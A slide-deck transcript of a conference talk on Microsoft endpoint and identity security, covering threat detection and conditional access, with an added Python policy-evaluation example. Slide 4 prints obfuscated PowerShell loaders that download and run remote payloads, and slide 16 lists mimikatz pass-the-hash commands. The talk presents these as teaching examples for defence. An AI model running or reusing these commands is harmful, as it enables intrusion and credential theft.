
ExpertsLiveEurope The New Era Of Endpoint Security


Cyber security and defense is the emerging topic of the IT industry these days. A secure environment is no longer just a well-maintained firewall or a well-managed network; rather, it is made up of several layers. However, most companies are "reactive" instead of "proactive", or neither, when it comes to securing their IT environments and detecting security breaches. In addition, the product portfolio and the security market are changing rapidly, and these changes make our jobs as IT professionals significantly more difficult. But how can we deal with this challenge? In my session I will look at supposedly "obvious" security threats and at how the Microsoft cyber security stack can help to detect attackers and threats that have evaded our defenses.

Published in: Technology


  1. The new era of endpoint security. Alexander Benoit, Microsoft MVP Enterprise Security | Certified Ethical Hacker, @ITPirate
  2. Alex Benoit, Lead Security Analyst, Modern Secure Workplace, Microsoft Threat Protection. Alexander.Benoit@sepago.de, @ITPirate | @TrustInTechCGN | @GeekZeugs, https://it-pirate.com/
  3. Microsoft Threat Protection
  4. Obfuscation. Sample 1: ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`t}.” `I`N`V`o`k`e`C`o`m`m`A`N`D”).” `N`e`w`S`c`R`i`p`T`B`l`o`c`k”((&(`G`C`M *w=O*)” `N`e`t`. `W`e`B`C`l`i`e`N`T”).” `D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘ht’+’tps://bit.ly/XYZ’))) Sample 2: $nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = ' http://aposdiqwpoe.com/BUR/testv.php?l=ando6.yarn'.Split('@');$SDC = $env:public + '' + $NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e- Item')($SDC);break;}catch{}
  5. Protect your data. Sandboxing and detonation: files in SPO, ODB and Teams; 1st and 3rd party reputation; multiple AV engines (SharePoint, OneDrive, Microsoft Teams). Leverage signals: collaboration signals (anonymous links, companywide sharing, explicit sharing, guest user activity); threat feeds (malware in email + SPO, Windows Defender, Windows Defender ATP, suspicious logins, risky IP addresses, irregular file activity); activity watch lists (users, IPs, on-demand patterns, e.g. WannaCry). Apply smart heuristics.
  6. Protect your data
  7. Conditional access. Conditions: users, devices, location, apps, session risk. Real-time evaluation engine (machine learning, policies). Effective policy controls: require MFA, allow access, deny access, force password reset, limit access.
  8. Conditional access
  9.–15. Conditional access (seven further slides with the same title)
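Slide 7 describes conditional access as an evaluation engine that takes conditions (user, device, location, app, session risk) and produces one effective control (allow, limit, require MFA, force password reset, deny). The following is an added example, not code from the presentation or from any Microsoft product, that shows how such an engine can be modeled: every matching policy contributes a control, and the strongest control wins. The trusted countries, privileged groups, sensitive apps and the three-level risk scale are constructed assumptions for the example.

```python
from dataclasses import dataclass
from enum import Enum


class Control(Enum):
    ALLOW = "allow access"
    LIMIT = "limit access"
    REQUIRE_MFA = "require MFA"
    FORCE_PASSWORD_RESET = "force password reset"
    DENY = "deny access"


# Ordered from weakest to strongest. When several policies match, the
# effective policy is the strongest control any of them produced.
STRENGTH = [Control.ALLOW, Control.LIMIT, Control.REQUIRE_MFA,
            Control.FORCE_PASSWORD_RESET, Control.DENY]


@dataclass
class SignIn:
    user: str
    groups: set            # group memberships of the user
    app: str               # application being accessed
    device_compliant: bool # device passed the compliance check
    country: str           # sign-in location (ISO country code)
    session_risk: str      # "low", "medium" or "high" (assumed risk scale)


# Constructed policy inputs for the example (not real tenant settings).
TRUSTED_COUNTRIES = {"DE", "NL"}
PRIVILEGED_GROUPS = {"Global Admins"}
SENSITIVE_APPS = {"Azure Portal"}


def evaluate(s: SignIn):
    """Return (effective control, reasons) for one sign-in attempt."""
    decisions = []  # (control, reason) for every policy that matched

    # Session-risk policies: a high-risk session is treated as a likely
    # compromised credential, medium risk only steps up authentication.
    if s.session_risk == "high":
        decisions.append((Control.FORCE_PASSWORD_RESET, "high session risk"))
    elif s.session_risk == "medium":
        decisions.append((Control.REQUIRE_MFA, "medium session risk"))

    # Privileged accounts always get MFA and never sign in from
    # non-compliant devices.
    if s.groups & PRIVILEGED_GROUPS:
        decisions.append((Control.REQUIRE_MFA, "privileged account"))
        if not s.device_compliant:
            decisions.append((Control.DENY,
                              "privileged account on non-compliant device"))

    # Location + device condition.
    if s.country not in TRUSTED_COUNTRIES and not s.device_compliant:
        decisions.append((Control.DENY,
                          "untrusted location and non-compliant device"))

    # Sensitive app from an unmanaged device: allow, but limit the session.
    if s.app in SENSITIVE_APPS and not s.device_compliant:
        decisions.append((Control.LIMIT,
                          "sensitive app from non-compliant device"))

    if not decisions:
        return Control.ALLOW, ["no policy matched"]
    effective = max((c for c, _ in decisions), key=STRENGTH.index)
    return effective, [reason for _, reason in decisions]


if __name__ == "__main__":
    s = SignIn("dave", set(), "Teams", False, "US", "medium")
    control, reasons = evaluate(s)
    print(control.value, reasons)
```

Keeping the reasons alongside the effective control matters in practice: the control is what the user experiences, the reasons are what the analyst needs when a sign-in is denied or a password reset is forced.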
  16. Pass-the-hash. 1. mimikatz 2. privilege::debug 3. sekurlsa::logonpasswords 4. sekurlsa::pth /user:Captain /ntlm:6f0bafeef436381c8d38d106c767f6c8 /domain:itpirate.local
  17. Pass-the-ticket. Prerequisites: 1. krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump) 2. Domain name 3. Domain's SID 4. Username that we'd like to impersonate
  18.–19. Pass-the-ticket (same prerequisite list repeated)
  20.–23. Pass-the-ticket
  24. Protect your admin identity
  25. Protection against identity theft. Detections along the attack chain: Reconnaissance (account enumeration, Net Session enumeration, DNS enumeration, SAM-R enumeration); Compromised credential (abnormal working hours, brute force using NTLM, Kerberos or LDAP, sensitive accounts exposed in plain-text authentication, service accounts exposed in plain-text authentication, honey token account suspicious activities, unusual protocol implementation, malicious Data Protection Private Information (DPAPI) request, abnormal VPN, abnormal authentication requests, abnormal resource access); Lateral movement (Pass-the-Ticket, Pass-the-Hash, Overpass-the-Hash); Privilege escalation (MS14-068 exploit (forged PAC), MS11-013 exploit (silver PAC)); Domain dominance (malicious service creation, skeleton key malware, golden ticket, remote execution, malicious replication requests, abnormal modification of sensitive groups).
  26. Protection against cloud threats. Malicious insider: protect against disgruntled employees before they cause damage. Ransomware: identify ransomware using behavioral analytics. Rogue application: identify rogue applications that access your data. Compromised accounts: combat advanced attackers that leverage compromised user credentials. Malware: detect malware in cloud storage as soon as it is uploaded. Data exfiltration: detect unusual flow of data outside of your organization.
  27. Detection across cloud apps. Indicators of a compromised session: activity from suspicious IP addresses, activity from anonymous IP addresses, activity from an infrequent country, impossible travel between sessions, logon attempt from a suspicious user agent. Malicious use of an end-user account: unusual file share activity, unusual file download, unusual file deletion activity, ransomware activity, data exfiltration to unsanctioned apps, activity by a terminated employee, multiple failed login attempts to app, suspicious inbox rules (delete, forward). Malicious use of a privileged user: unusual impersonated activity, unusual administrative activity, unusual multiple delete VM activity. Threat delivery and persistence: malware implanted in cloud apps, malicious OAuth application.
  28. Malware detection. Scan cloud storage apps; identify potentially risky files.
  29. Thank you! Gold, Silver and Conference Partners
